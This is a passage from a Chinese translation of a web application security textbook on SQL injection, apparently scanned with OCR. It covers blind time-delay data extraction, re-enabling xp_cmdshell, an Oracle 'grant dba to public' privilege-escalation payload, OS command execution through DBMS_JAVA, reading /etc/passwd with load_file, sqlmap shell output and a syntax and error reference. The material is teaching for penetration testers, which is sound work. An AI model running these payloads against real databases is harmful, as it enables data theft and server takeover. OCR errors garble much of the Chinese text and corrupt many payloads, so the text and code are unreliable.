在 应 用 程序 返回 条 件 性 响应 时 用 到 的 相同 技巧 。 现在， 如 果 满 足 一 个 特殊 条 件 , 注入 的 查询 就 不 
再 触发 一 个 不 同 的 应 用 程序 啊 应 ， 相反, 它 引 发 一 次 时 间 延 角 。 例 如 ， 下 面 的 第 二 个 查询 将 引发 
一 次 时 间 延 运 ， 表 示人 被 截获 字符 串 的 第 一 个 字母 为 A。 

if ASCIT(SUBSTRING{’'AGmin’',1,1)}) = 64 waitfor delay '0:0:5' 

1if ASCIT(SUBSTRING{’'AGmin’',1,1)}) = 65 waitfor delay :0:0:51 


和 前 面 一 样 ， 攻击 者 可 以 循环 使 用 每 个 字符 的 所 有 可 能 值 ， 直 到 发 生 时 间 延 人 运 。 男 外 ， 可 以 
通过 减少 所 需 请 求 的 数量 ， 提 高 攻击 的 效率 。 邦 一 个 技 马 是 将 每 个 字 节 的 数据 划分 成 比特 ， 并 在 
每 次 查询 中 获得 一 比特 的 数据 。POWER 命 令 和 按 位 “与 ”运算 符 & 可 在 逐 比特 的 基础 上 指定 条 件 。 
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例如 ， 以 下 查询 测试 被 截获 数据 的 第 一 字 节 的 第 一 比特 ， 如 末 其 值 为 1， 终 止 碍 询 : 





if (ASCII(SUBSTRING ('RAdmin',1,1)) & (POWER(2,0))) > 0 waitfor delay '0:0:5， 
下 面 的 查询 对 第 二 比特 执行 相同 的 测试 : 
if (ASCII(SUBSTRING('Admin',1,1)) & (POWER(2,1))) > 0 waitfor delay '0:0:5， 


如 前 所 述 , 这 种 引发 时 间 延 迟 方 法 的 准确 性 在 很 大 程度 上 取决 于 所 使 用 的 数据 库 。 在 当前 版 
本 的 My-SQL 中 ， 睡 虐 消 数 可 创建 指定 时 间 的 时 间 延 人 运 ， 例 如 : 

select if(user() like 'root@%', sleep(5000), .false 

在 5.0.12 版 本 之 前 的 MySQL 中 ， 不 能 使 用 睡眠 了 消 数 ,但 可 以 使 用 基准 冰 数 (benchmark 
function ) 重复 执行 一 个 特定 的 操作 。 指 示 数 据 库 执行 一 个 处 理 需 密集 型 操作 ,如 SHA-1 散 列 , 大 
量 的 操作 次 数 将 造成 一 次 可 测量 的 时 间 延 迟 。 例 如 : 

select if(user() like 'root@%®', benchmark (50000 shalltest'I))，false' 

在 PostereSQL 中 可 使 用 PG_sLEEP 也 数 ， 其 使 用 方法 与 MySQL 有 睡眠 沁 数 相 同 。 

在 Oracle 中 ， 没 有 产生 时 间 延 迟 的 内 置 方法 ， 一 种 方法 是 使 用 urL_HTTP 连 接 一 个 不 存在 的 
服务 器 ， 造 成 一 次 操作 超时 。 这 会 使 数据 库 尝 试 与 指定 的 服务 器 建立 连接 ， 并 最 终 造 成 超时 。 
例如 : 


SELECT 'a’'||Ut] Http.request('http://madeupserver.com') from Gual 














...delay... 

ORA-29273: HTTP request faileqd 

ORA-06512: at "SYS.UTL HTTP", line 1556 

ORA-12545: Connect failed because target host or obiject does not exist 


可 以 利用 这 种 行为 根据 指定 的 某 个 条 件 造 成 时 间 延 人 运 。 例如 ,如 果 上 默认 的 Oracle 账 户 DBSNMP 
人 存在， 下面 的 查询 将 会 造成 一 次 超时 : 


SELECT 'a’'||Utl Http.request('http://madeupserver.com') FROM dual WHERE 
(SELECT username FROM all users WHERE usSername = 'DBSNMP') = 'DBSNMP' 


如 前 所 述 , 在 Oracle 和 MySQL 数 据 库 中 , 都 可 以 使 用 SUBSTR (ING) 和 ASCII 也 数 每 次 一 字 市 
地 获取 任意 信息 。 














提示 ”我们 已 经 说 明了 如 何 使 用 时 间 延 迟 来 获得 有 用 的 信息 。 然 而 ， 当 对 应 用 程序 进 
局 行 初 步 探 查 、 检 测 SQL 注 入 漏洞 时 ， 时 间 延 迟 技巧 也 可 能 非常 有 用 。 在 一 些 完 全 育 目 
的 SQL 注 入 攻击 中 ,浏览 器 中 不 会 显示 查询 结果 ， 所 有 错误 部 被 应 用 程序 以 隐 含 的 方 
式 处 理 ， 使 用 提交 专门 设计 的 输入 的 标准 技巧 可 能 很 难 检测 出 漏洞 。 这 时 ,使 用 时 间 


延迟 是 在 初步 探查 过 程 中 检测 一 个 漏洞 是 否 存 在 的 最 有 效 方 法 。 例如， 如 果 后 端 数 据 
库 为 MS-SQL, 那么 可 以 将 下 面 的 两 个 字符 串 轮 流 注入 每 个 请 求 参数 中 , 并 监控 应 用 程 
序 响应 请 求 所 用 的 时 间 ， 从 而 确定 所 有 漏洞 : 


'; waitfor delay '0:30:0'-- 
1; waitfor delay '0:30:0'-- 
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本 实验 示例 包含 一 个 不 会 返回 任何 错误 反 锯 的 SQL 注入 漏洞 ， 可 使 用 它 练 习 各 种 高 级 技 
巧 ， 包 括 条 件 式 响应 和 时 间 延 迟 。 
http://mdsec.net/addressbook/44/ 





9.2.11 _ SQL 注入 之 外 : 扩大 数据 库 攻 击 范围 


成 功利 用 一 个 SQL 注 入 漏洞 往往 可 完全 控制 应 用 程序 的 所 有 数据 。 大 多 数 应 用 程序 仅 使 用 一 
个 账户 访问 数据 库 , 并 且 依赖 应 用 程序 层 控制 在 不 同 的 用 户 间 实施 访问 隅 离 。 如 采 能 够 无 限制 地 
使 用 应 用 程序 的 数据 库 账 户 ， 就 可 以 目 由 访问 其 中 的 数据 。 
因此 ， 可 以 假设 , 拥有 应 用 程序 的 所 有 数据 是 SQL 注 入 攻击 的 最 终日 的 。 然 而 ,许多 原因 表 
明 , 利用 数据 库 中 的 漏洞 ， 或 者 控制 它 的 一 些 内 置 功能 以 达到 目的 ， 从 而 进一步 实施 攻击 ， 可 能 
会 取得 更 大 的 成 效 。 通 过 扩大 数据 库 攻 击 范 围 可 实施 的 其 他 攻击 如 下 。 
口 如 打数 据 库 被 其 他 应 用 程序 共 吝 ， 可 以 通过 提升 数据 库 的 使 用 权限 访问 其 他 应 用 程序 的 
数据 。 
口 可 以 攻破 数据 库 服务 天 的 操作 系统 。 
口 可 以 访问 其 他 系统 。 通 常 ， 数 据 库 服务 侣 是 一 个 在 几 层 网 络 边 界 防 御 保 护 下 的 网 络 中 的 
主机 。 如 来 能 够 控制 数据 库 服务 带 ， 攻 击 者 束 处 在 一 个 可 信 的 位 置 上 ， 可 以 访问 其 他 主 
机 上 的 关键 服务 ， 进 一 步 对 其 加 以 利用 。 
口 可 以 在 主机 基础 架构 与 自己 的 计算 机 之 间 建 立 网 络 连 接 。 这 样 ， 攻 击 者 就 可 以 完全 避 开 应 
用 程序 的 防御 ,轻易 传送 从 数据 库 收集 到 的 大 量 敏感 数据 ,并且 可 穿 透 许多 入 侵 检测 系统 。 
口 可 以 通过 创建 用 户 定义 的 功能 任意 扩充 数据 库 的 现 有 功能 。 有 些 时 候 ， 可 以 通过 这 种 方 
式 草 新 执行 已 被 删除 或 荣 用 的 功能 ， 避 开 数 据 库 实施 的 强化 保护 措施 。 只 要 已 经 医 得 数 
据 库 管理 员 (DBA ) 权限 ， 就 有 办 法 在 每 种 主流 数据 库 中 执行 这 种 操作 。 


























© 错误 观点 许多 数据 库 管 理 员 认 为 ， 数 据 库 没有 必要 防御 需要 通过 验证 才能 加 以 利用 
的 攻 主 。 他 们 以 为 ， 只 有 相同 组 织 拥有 的 可 信 应 用 程序 才能 访问 数据 库 这 种 观点 忽略 


了 恶意 第 三 方 利 用 应 用 程序 中 存在 的 缺陷 , 在 应 用 程序 认为 安全 的 背景 下 与 数据 库 交 互 
的 可 能 性 。 刚 刚 描述 的 每 一 种 可 能 的 攻击 证 明 ， 数 据 库 必须 防御 通过 验证 的 攻击 者 。 














攻击 数据 库 是 一 个 内 容 广 沁 的 主题 , 它 不 在 本 书 的 讨论 汇 围 之 内 ,本 市 将 分 析 几 种 关键 方法 ， 
说 明 如 何 通过 它们 利用 主要 数据 库 的 漏洞 和 功能 扩大 攻击 范围 。 我 们 得 出 的 主要 绪论 是 : 每 种 数 
据 库 都 有 提升 权限 的 可 能 性 。 应 用 当前 发 布 的 安全 补丁 和 可 菲 的 强化 措施 能 够 帮助 避免 许多 (但 
并 非 全 部 ) 这 种 攻击 。 

1. MS-SQL 

最 常 被 攻击 者 滥用 的 数据 库 功 能 可 能 是 xp_cmdshell 存 储 过 程 , 它 是 MS-SQL 默 认 内 置 的 一 
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项 功能 。 这 个 存储 过 程 允 许 数据 库 管 理 员 用 户 以 和 cmq. exe 命 令 提 示 符 相同 的 方式 执行 操作 系统 
命令 。 例 如 : 

master. .xp cmdshell 'ipconfig > foo.txt， 

攻击 者 可 在 众多 情况 下 滥用 这 项 功能 。 他 们 可 以 执行 任意 命令 , 将 结果 指向 本 地 文件 ,然后 
读 取 文件 内 容 。 他 们 可 以 打开 一 个 连通 自己 计算 机 的 党 外 网 络 连 接 , 并 建立 一 条 秘密 的 命令 和 通 

言 渠 道 ， 从 服务 六 复制 数据 并 上 传 攻 击 工 具 。 由 于 MS-SQL 黑 认 以 LocalSystem 运 行 ,攻击 者 一 

般 能 够 完全 攻破 基本 的 操作 系统 ， 执 行 任 意 操作 。MS-SQL 中 还 有 许多 其 他 存储 过 程 ， 如 
xp_regread 或 xp_regwrite， 也 可 用 于 在 Windows 操 作 系统 注册 表 中 执行 强大 的 操作 。 

euUUUUUD 

互联 网 上 的 大 多 数 MS-SQL 为 MS-SQL 2005 或 更 高 版 本 。 这 些 版 本 提供 各 种 安全 功能 ， 可 以 
在 默认 情况 下 锁定 数据 库 ， 以 防止 各 种 攻击 。 

但 是 ， 如 来 数据 库 中 的 Web 应 用 程序 用 户 账户 拥有 足够 高 的 权限 ， 则 通过 重新 设置 数据 库 ， 
该 用 户 就 可 以 突破 上 述 功 能 实施 的 限制 。 例 如 ， 可 以 使 用 sp_configure 和 存储 过 程 重新 局 用 被 禁 
用 的 xp_cmdqshel1。 以 下 4 行 SQL 代码 用 于 实现 这 一 目的 : 


























EXECUTE sp configure 'show advanced options', 1 
RECONFIGURE WITH OVERRIDE 
EXECUTE sp configure 'xp cmdshell’', '1' 


RECONFIGURE WITH OVERRIDE 
这 样 ，xp_cmdshel1 就 被 重新 启用 ， 并 可 以 通过 以 下 命令 运行 : 
exec xp cmAdshell] :QTr: 


2. Oracle 

人 们 已 在 Oracle 数 据 库 软件 中 发 现 了 大 量 安 全 漏洞 。 如 果 找 到 一 个 允许 执行 任意 查询 的 SQL 
注入 漏洞 ， 那 么 就 可 以 利用 这 种 漏洞 提升 到 数据 库 管 理 员 权限 。 

Oracle 包 含 许 多 可 在 数据 库 管 理 员 权限 下 运行 的 内 置 的 存储 过 程 ， 并 已 发 现在 这 些 存储 过 程 
中 存在 SQL 注入 漏洞 。 在 2006 年 7 月 发 布 重 要 补丁 前 ， 存 在 于 默认 包 SYs.DBMS_EXPORT_ 
EXTENSION .GET_DOMAIN_INDEX_TABLES 中 的 缺陷 就 是 一 个 典型 的 示例 。 攻 击 者 可 以 利用 这 个 
缺陷 ， 在 易 受 攻击 的 字段 中 注入 grant DBA to public 查 询 来 提升 权限 。 

select SYS.DBMS EXPORT EXTENSION.GET DOMAIN INDEX TABLES{'INDX','SCH', 


'TEXTINDEXMETHODS" .ODCITINdexUtilCleanup(:p1); execute immediate 
''declare pragma autonomous transaction; begin execute immediate 

















IIGrant dba to public'’''’' ; end;''; END;-—-', CTXSYS’',1,'1',0) from Qual 
这 种 类 型 的 攻击 可 通过 利用 Web 应 用 程序 中 的 SQL 注 入 漏洞 ， 在 易 受 攻击 的 参数 中 注 和 信子 数 


来 实现 。 

除 这 些 漏 洞 外 ，Oracle 还 含有 大 量 默认 功能 ， 这 些 功 能 可 被 低 权 限 用 户 访问 ， 并 可 用 于 执行 
各 种 敏感 操作 , 如 建立 网 络 连接 或 访问 文件 系统 。 除 了 前 面 描述 的 用 于 建立 带 外 连接 的 功能 强大 
的 包 以 外 ，UTL_FILE 包 可 用 于 在 数据 库 服 务 带 文件 系统 上 谈 取 和 写 人 文件 。 

2010 年 ，David Litchfield 演 示 了 如 何在 Oracle 10g R2 和 11g 中 利用 Java 来 执行 操作 系统 命令 。 
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该 攻击 首先 利用 DBMS_JVM_EXP_PERMS .TEMP_JAVA_POLICY 中 的 缺陷 授予 当前 用 户 java.io. 
filepermission 权限 ， 然 后 使 用 DBMS_JAVA .RUNUAVA 执行 运行 二 人 系 统 命 令 的 Java 类 
(Gracle/aurora /til /Wrapper 所 例如 : 


DEMS JAVA.RUNJAVA('oracle/aurora/util/Wrapper c:\\windows\\System32\, 
cmd.exe /c dir>c:\\OUT.LST!') 


请 访问 以 下 链接 了 解 相关 详情 : 

DQ www.databasesecurity.com/HackingAurora.gdf 

D www.notsosecure.com/folder2/2010/08/02blackhat-2010/ 

3. MySQL 

与 前 面 讨论 的 其 他 数据 库 相 比 ，MySQL 中 包含 的 可 被 攻击 者 滥用 的 内 置 功能 相对 较 少 。 其 
中 一 个 示例 是 任何 拥有 FILE_PRIV 许 可 的 用 户 都 可 以 谈 取 并 写 和 人 文件 系统 。 

LOAD_FILE 命 令 可 用 于 获取 任何 文件 的 内 容 。 例 如 : 


select load file('/etc/passwd'! 


SELECT ...INTO OUTFILE 命令 可 用 于 将 任何 一 个 查询 的 输出 指向 一 个 文件 。 例 如 : 


create table test (a varchar(200)) 











insert into test(a) values (+ 十 !) 
select * from test into outfile '/etc/hosts.egquiyv’ 


除 读 取 并 写 和 人 关键 的 操作 系统 文件 外 ， 这 些 命令 还 可 用 于 执行 其 他 攻击 。 

口 因为 MySQL 将 数据 保存 在 明文 文件 中 ， 数 据 库 必须 拥有 读 取 这 些 文件 的 权限 。 拥 有 
FILE_PRIV 许 可 的 攻击 者 可 以 打开 相关 文件 并 读 取 数据 库 中 的 任何 数据 ， 避 开 数 据 库 实 
施 的 任何 访问 控制 。 

口 MySQL 人 允许 用 户 通 过 调用 一 个 包含 靖 数 执行 过 程 的 编译 库 文 件 ( compiled library file ) 创 
建 一 个 用 户 定义 的 函数 (UDF )。 这 个 文件 必须 位 于 MySQL 加 载 动 态 库 的 正常 路 径 内 。 攻 
击 者 可 以 使 用 前 面 描述 的 方法 在 这 个 路 径 中 创建 任意 二 进 制 文件 ， 然 后 建立 使 用 这 个 文 
件 的 UDF。 请 参阅 Chris Anley 的 论文 “Hackproofing MySQL ”了 解 这 种 技巧 的 详情 。 

















9.2.12 使 用 SQL 注 入 工具 


我 们 介绍 的 许多 利用 SQL 注入 漏洞 的 攻击 技巧 都 需要 提交 大 量 请 求 ， 以 和 逐次 提取 少量 的 数 
据 。 洗 运 的 是 ,我 们 可 以 使 用 各 种 工具 来 自动 完成 上 述 过 程 ; 同时 ,这 些 工具 还 能 够 识别 成 功 实 
施 攻击 所 需 的 数据 库 特 定 的 语法 。 
当前 ， 多 数 工 具 通 过 以 下 方法 来 利用 SQL 注入 漏洞 。 
口 对 目标 请 求 中 的 所 有 参数 实施 蛮 力 攻击 ， 以 查找 SQL 注入 点 。 
口 通过 附加 各 种 字符 ， 如 闭 括号 、 注 释 字 符 和 SQL 关键 字 ,， 确定 后 端 SQL 查询 中 易 受 攻击 的 
字段 的 位 置 。 
口 通过 蛮 力 猜测 请 求 的 列 数 ， 然 后 确定 包含 varchar 数 据 类 型 的 列 ( 可 用 于 返回 结果 )， 尝 
试 实施 UNION 攻 击 。 
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口 注入 定制 查询 来 检索 任意 数据 一 一 如 果 需 要 ， 将 多 个 列 中 的 数据 串 连 成 一 个 字符 串 ， 以 
便于 从 单独 一 个 varchar 数 据 类 型 的 结 采 中 进行 检索 。 
口 如 果 无 法 使 用 UNION 检 索 结 果 ， 可 以 在 查询 中 注入 布尔 型 条 件 (AND 1=1、AND 1=2 等 )， 
以 确定 是 否 可 以 使 用 条 件 啊 应 来 检索 数据 。 
口 如 末 无 法 通过 注入 条 件 表达 式 来 检索 结 有 末 ， 可 以 和 尝试 使 用 条 件 时 间 延 迟 来 检索 数据 。 
这 些 工 具 通 过 在 日 标 数据 库 中 查询 相关 元 数据 表 来 查找 数据 。 通 第 ,它们 能 够 执行 一 定 程度 
的 权限 提升 ， 如 使 用 xp_cmdshel1l 获 得 操作 系统 级 访问 权限 。 它 们 还 使 用 各 种 优化 技巧 ， 并 利 
用 各 种 数据 库 中 的 诸多 功能 和 内 置 函数 , 以 减少 基于 推测 的 亦 力 攻击 所 需 提交 的 查询 数 ,， 避 开 可 
能 对 单 引 号 实施 的 过 滤 ， 等 等 。 

















注解 ”这些 工 具 是 主要 的 注入 工具 ， 最 适 于 通过 利用 已 确定 并 熟悉 的 注入 点 ， 从 数据 
库 中 提取 数据 。 但 是 ， 在 查找 并 利用 SQL 注入 缺陷 方面 ， 它 们 也 不 是 万 能 的 。 实 际 上 ， 
在 通过 这 些 工具 注入 数据 之 前 或 之 后 ， 通 第 需要 提供 其 他 一 些 SQL 语法 ， 以 确保 这 些 


工具 的 硬 编码 攻击 生效 。 





渗透 测试 步 又 

使 用 本 章 前 面部 分 介绍 的 技巧 确定 某 个 SQL 注入 漏洞 后 ,可 以 考虑 使 用 SQL 注入 工具 来 利 
用 该 源 洞 ， 并 从 数据 库 中 检索 有 用 的 数据 。 在 需要 使 用 讲 目 技巧 每 次 检索 少量 数据 时 ,这 种 做 
2 

(1) 使 用 拦截 代理 服务 需 运 行 SQL 注入 工具 , 分 析 该 工具 提交 的 请 求 以 及 应 用 程序 的 响应 。 
打开 工具 上 的 任何 详细 输出 选项 ， 并 将 它 的 进度 与 观察 到 的 查询 和 啊 应 关联 起 来 。 

(2) 由 于 这 些 工 具 通 和 依赖 预先 设置 的 测试 和 特定 的 啊 应 场 法 ， 因 此 ， 攻 击 者 可 能 需要 将 
数据 附加 或 前 置 到 这 些 工 具 注 入 的 字符 串 中 ,以 确保 获得 预期 的 啊 应 。 典 型 的 要 求 包括 添加 注 
释 字 符 、 平 衡 服务 需 的 SQL 查询 中 的 单 引 号 ， 以 及 将 闭 括号 前 置 或 附加 到 字符 串 以 与 原始 查询 
匹配 。 

(3) 如 有 果 尽 管 采 用 了 上 述 方法 ， 但 查询 语法 仍然 无 效 ， 这 时 ， 最 简单 的 方法 是 创建 完全 受 
控制 的 般 套 查询 , 并 使 用 注入 工具 注入 该 子 查 询 。 这样, 注入 工具 承 可 以 通过 推 膝 来 提取 数据 。 
在 注入 标准 的 SELECT 和 UPDATE 查 询 时 ,和 瞬 套 查询 非常 有 用 。 在 Oracle 中 , 藤 套 查询 位 于 INSERT 
语 名 中。 下面 的 示例 前 置 [input] 之 前 的 文本 ， 并 附加 该 位 置 之 后 的 闭 括 号 : 

DQ Oracle: '||(select 1 from dual where 1=[input]) 

UD MS-SQL: (select 1 where 1=[input]) 






































有 大 量 工 具 可 用 于 实施 上 自动 SQL 注 入 攻击 。 其 中 许多 工具 针对 MS-SQL， 其 他 一 些 工具 已 集 
止 开 发 ， 并 因为 新 技巧 的 出 现 和 SQL 注入 领域 的 发 展 而 废弃 。 笔 者 推荐 sqlmap ， 该 工具 可 用 于 攻 
击 MySQL 、Oraclg 、MS-SQL 及 其 他 数据 库 。 它 执行 基于 UNION 和 推 盯 的 检索 ， 并 且 文 持 各 种 权 
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限 提升 方法 ， 包 括 从 操作 系统 中 检索 文件 ， 以 及 在 Windows 中 使 用 xp_cmdshel1 执 行 命令 。 

实际 上 ，sqlmap 是 一 种 通过 时 间 延 迟 或 其 他 推断 方法 检索 数据 库 信 息 的 有 效 工 具 , 并 且 可 用 
于 基于 UNION 的 检索 。 利 用 该 工具 的 最 佳 方 法 之 一 ,是 使 用 --sql-shell 选 项 。 这 样 ,攻击 者 将 
能 够 在 SQL 提示 符 下 于 后 台 执 行 必要 的 UNION、 基 于 错误 或 育 目的 SQL 注入 , 以 发 送 和 检索 结果 。 
例如 : 


C:\sgqglmap>sqlmap.py -u http://wahh-app.com/employees?EmPNoO=7369 --union-—use 





-—-Sgql-shell -pp Empno 


sqlmap/0.8 - automatic SQL injection and database takeover tool 
http://sgqlmap.sourceforge.net 


[*] starting at: 14:54:39 


[14:54:39] [INFO] using 'C:\sqlmap\output\wahh-app.com\session' 

as session file 

[14:54:39] [INFO] testing connection to the target url 

[14:54:40] [WARNING] the testable parameter 'EmPno' you provided is not 
into the 

Cookie 

[14:54:40] [INFO] testing if the Url 1S stable, wait a few seconds 
[14:54:44] [INFO] url is stable 

[14:54:44] [INFO] testing sgl injection on GET parameter ‘Empno' with 0 








parenthesis 

[14:54:44] [INFO] testing unescaped numeric injection on GET parameter 
' EMPNO' 

[14:54:46] [INFO] confirming unescaped numeric injection on GET 
Parameter ‘EmPNO' 

[14:54:47] [INFO] GET Parameter 'Empno' is unescaped numeric injectable 
with 0 

parenthesis 

[14:54:47] [INFO] testing for parenthesis on injectable parameter 


[14:54:50] [INFO] the injectable parameter requires 0 parenthesis 
[14:54:50] [INFO] testing MySOL 

[14:54:51] [WARNING] the back-end DMBS is not MySOQL 

[14:54:51] [INFO] testing Oracle 

[14:54:52] [INFO] confirming Oracle 

[14:54:53] [INFO] the back-end DBMS is Oracle 


web server operating system: Windows 2000 











web application technology: ASP, Microsoft IIS 5.0 
back-end DBMS: Oracle 


[14:54:53] [INFO] testing inband sal injection on parameter ‘Empno' with 
NULL 
bruteforcing technique 
[14:54:58] [INFO] confirming full inband sgql injection on parameter 
' EMPNO 
[14:55:00] [INFO] the target Url is affected by an exploitable full 
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inbangd 


sgl injection vuljnerability 


valid union: 'http://wahh-app.com: 80/employees.asp?EmMPnNnoO=7369%20 
UNIONSS20ALLS%20SEL 
ECT%S20NULLS2C%20NULL%S2C%20NULL%S2C%20NULL%S20FROM%20DUAL-—- 名 20ANDS%S20 
3663=3663， 


[14:55:00] [INFO] calling Oracle shell. To quit type 'x' or 'dq' and 
Press ENTER 

Sol-shell> select banner from veversion 

do you want to retrieve the SOL statement output? [Y/nl] 

[14:55:19] [INFO] fetching SQL SELECT statement query output: 'select banner 


from voSversion! 








select banner from vesversion [5]: 

[*] CORE 9 ,2.0,L.0 Production 

[*] NLSRTL Version 9.2.0.1.0 - Production 

[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production 


[*] PL/SOL Release 9.2.0.1.0 - Production 
[*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production 





sgql-shell> 
9.2.13 ”SQL 语法 与 错误 参考 


我 们 已 经 描述 了 各 种 探查 与 利用 Web 应 用 程序 中 存在 的 SQL 注 入 漏洞 所 逢 的 技巧 。 许 多 时 
候 ， 回 不 同 的 后 端 数 据 库 平 台 实 施 攻击 时 需要 用 到 的 语法 之 间 存 在 一 些 细微 的 差别 。 另 外 ,每 一 
种 数据 库 都 生成 不 同 的 错 ; 当 探 查 各 种 漏洞 以 及 笠 试 设计 一 种 有 效 的 利用 手段 时 , 需要 理 
解 它 们 的 含义 。 下面 简要 介绍 这 些 语法 和 这 些 语法 的 适用 情况 ,并 人 解释 使 用 过 程 中 出 现 的 一 些 不 
第 见 的 错误 消息 。 




















1. SQL 语 ;天 
要 求 ASCII 和 SUBSTRING 
Oracle ASCII('A') 等 于 65 SUBSTR('ABCDE',2,3) 等 于 BCD 
MS-SQL ASCII('A') 等 于 65 SUBSTRING ('ABCDE',2,3) 等 于 BCD 
MySQL ASCIIT('A') 和 等 于 65 SUBSTRING{"ABCDE"',2,3) 等 于 BCD 
要 来 获取 当前 数据 库 用 户 
Oracle Select Sys.login user from dual 
SELECT user FROM dual 
SYS_CONTEXT ('USERENV', 'SESSION_USER') 
MS-SQL select suser_ sname() 


MySQL SELECT user() 
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〈 续 ) 
要 来 引起 时 间 延 迟 
Oracle Utl Http.request('http://madeupserver.com') 
MS-SQL waitfor delay '0:0:10' exec master..xp_ cmdshell 'ping localhost' 
MySQL sleep(100) 
要 求 获取 数据 库 版 本 字符 串 
Oracle select banner from v$Sversion 
MS-SQL select @@version 
MySQL select @@version 
要 求 获取 当前 数据 库 
Oracle SELECT SYS_CONTEXT ( 'USERENV' ，'DB_NAME ' ) FROM dual 
MS-SQL select db name() 
获取 服务 从 名 称 可 使 用 : 
select @Qservername 
MySQL Select database() 
要 求 获取 当前 用 户 的 权限 
Oracle SELECT privilege FROM session privs 
MS-SQL SELECT grantee, table name, privilege type FROM 
INFORMATION_ SCHEMA .TABLE PRIVILEGES 
MySQL SELECT * FROM information schema.user privileges 
WHERE grantee = ' [user] ' 此 处 [user] 由 SELECT user() 的 输出 决定 
要 求 在 一 个 单独 的 结果 列 中 显示 所 有 表 和 列 
Oracle Select table name||' 
'||column name from all_tab columns 
MS-SQL SELECT table name+' 
',Column name from information schema.columns 
MySQL SELECT CONCAT(table name+t' 
',Column name) from information schema.columns 
要 求 显示 用 户 对 象 
Oracle Select object name, object type from user_objects 
MS-SQL SELECT name FROM sysobjects 
MySQL SELECT table name FROM information schema.tables (或 trigger name from 


information schema.triggers 等 ) 
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( 续 ) 
要 来 显示 用 户 表 
Oracle Select object name, object type from user objectsWHERREobject_ type= 'TABTE 
或 者 显示 用 户 访 问 的 所 有 表 : SELECT table name FROM all tables 
MS-SQL SELECT name FROM sysobjectsWHERExtype='U' 
MySQL SELECT table name FROM information schema.tables 
where table type='BASE TABLE' and table schema!='mysql' 
要 求 显示 表 foo 的 列 名 称 
Oracle Select column name, Name from user tab columns where table name = 
'FOO' 如果 目 标 数据 不 为 当前 应 用 程序 用 户 所 有 ， 使 用 ALL_table_columns 表 
MS-SQL SELECT column name, FROM information schema.columns 


WHERE table name='foo' 
MySQL SELECT column name FROM information schema.columns 


WHERE table name='foo' 


要 求 与 操作 系统 交互 〈 最 简单 的 方式 ) 
Oracle 请 参阅 David Litchfield 所 著 的 The Oracle Hacker's Handbook 一 书 
MS-SQL exec xp_cmshell 'dir c:\! 

MySQL select load_ file('/etc/passwd') 


Oracle ORA-01756: quoted string not properly terminated 
ORA-00933:SOLcommand not properly ended 

MS-SQL Msg 170, Level 15, State 1, Line 1 
Line 1: Incorrect syntax near 'foo 
Msg 105, Level 15, State 1, Line 1 


Unclosed quotation mark before the character 





string 'foo 
MySQL You have an error in your SOL syntax. Check 


the manual that corresponds to your MySOL server version for the right 
syntax to use near ''foo' at line XxX 


原因 对 Oracle 和 MS-SQL 而 言 ，SQL 广 入 确实 存在 ， 并 且 几 乎 肯定 可 以 加 以 利用 。 如 果 输 入 一 个 单 


引号 ， 它 改变 数据 库 查 询 的 语法 ， 这 是 预料 之 中 的 错误 
对 MySQL 而 言 ，SQL 注 入 可 能 存在 ， 但 相同 的 错误 消息 可 能 出 现在 其 他 情况 下 
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〈 绥 ) 
Oracle PLS-00306: wrong number or types of arguments 
in call to :XXX 
MS-SQL Procedure ‘'XXxX' expects parameter '@QYYY', 
which was not supplied 
MySQL N/A 
原因 已 经 注释 挥 或 删 挥 一 个 通常 会 提交 给 数据 库 的 变量 。 在 MS-SQL 中 ， 应 该 可 以 使 用 时 间 延 迟 
枚 举 获 得 任意 数据 
Oracle ORA-01789: query block has incorrect number of 
result columns 
MS-SQL Msg 205, Level 16, State 1, Line 1 
All gqueries in an SQL statement containing a 
UNION operator must have an equal number of 
expressions in their target lists. 
MySQL The Used SELECT statements have a different 
number of columns 
原因 当 试 图 实施 UNION SELECT 攻击 时 ， 就 会 看 到 这 个 错误 消息 ; 攻击 者 指定 了 一 个 与 原始 
SELECT 语句 不 同 的 列 数 
Oracle ORA-01790: expression must have same datatype 
as corresponding expression 
MS-SQL Mag 245, Level 1l6% State ly Linel 
Syntax error converting the varchar value 
'foo' to a column of data type int. 
MySQL (在 MySQL 中 不 会 造成 任何 错误 ) 
原因 当 试 图 实施 UNION SELECT 攻击 时 ， 就 会 看 到 这 个 错误 消息 ; 攻击 者 指定 了 一 个 与 原始 
SELECT 语句 不 同 的 数据 类 型 。 尝 试 使 用 NULL ， 或 者 使 用 1 或 2000 
Oracle ORA-01722: invalid number 
ORA-01858: a non-numeric character was found 
where a numeric was expected 
MS-SQL Meg 24959, Level 16, Stabte ly Tine 1 
Syntax error converting the varchar value 
'foo' to a column of data type int. 
MySQL ( 在 MySQL 中 不 会 造成 任何 错误 ) 
原因 输入 与 字段 中 需要 的 数据 类 型 不 匹配 。 可 能 存在 SQL 注 入 漏洞 ， 可 能 不 需要 一 个 单 引 号 ， 





此 尝试 输入 一 个 数字 ， 后 接 注入 的 SQL 查 询 
在 MS-SQL 中 ， 应 该 可 以 利用 这 条 错误 消息 返回 任何 学 符 串 








Oracle ORA-00923: FROM keyword not found where expected 
MS-SQL N/A 
MySQL N/A 
原因 下 面 的 语句 可 在 MS-SQL 中 运行 : 
SELECT 1 


但 在 Oracle 中 ， 如 果 想 要 返回 任何 内 容 ， 必 须 从 一 个 表 中 选择 。 使 用 DUAL 表 即 可 : 
SELECT 1 from DUAL 
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ORA-00936: missing expression 
Msg 156, Level 15, State 1, Line 1 
Incorrect syntax near the keyword 'from'. 


You have an error in your SQL syntax. Check 
the manual that corresponds to your MySOL 
server version for the right syntax to use 
near ' XXX , YYY from SOME TABLE' at line 1 


当 注 入 点 出 现在 FROM 关键 字 之 前 ( 例如 , 注入 了 将 要 返回 的 列 ) 或 使 用 注释 符号 删除 了 不 可 
缺少 的 SQL 关 键 字 时 ， 常 常会 看 到 这 条 错误 消息 


尝试 使 用 注释 字符 结束 SQL 语 句 
当 遇 到 这 种 条 件 时 ，MySQL 可 以 揭示 列 名 XXX, YYY 








ORA-00972: identifier is too long 

String or binary data would be truncated. 

N/A 

这 条 错误 消息 并 不 表示 存在 SQL 注入 漏洞 。 如 有 果 遇 到 一 个 超 长 的 字符 串 ， 可 能 会 看 到 这 条 错 
误 消 息 。 也 不 可 能 遇 到 组 种 区 溢出 ， 因 为 数据 库 正 在 安全 地 处 理 输入 

ORA-00942: table or View does not exist 


Msg 208, Level 16, State 1, Line 1 
Invalid object name 'foo' 








Table 'DBNAME.SOMETABLE' doesn't exist 
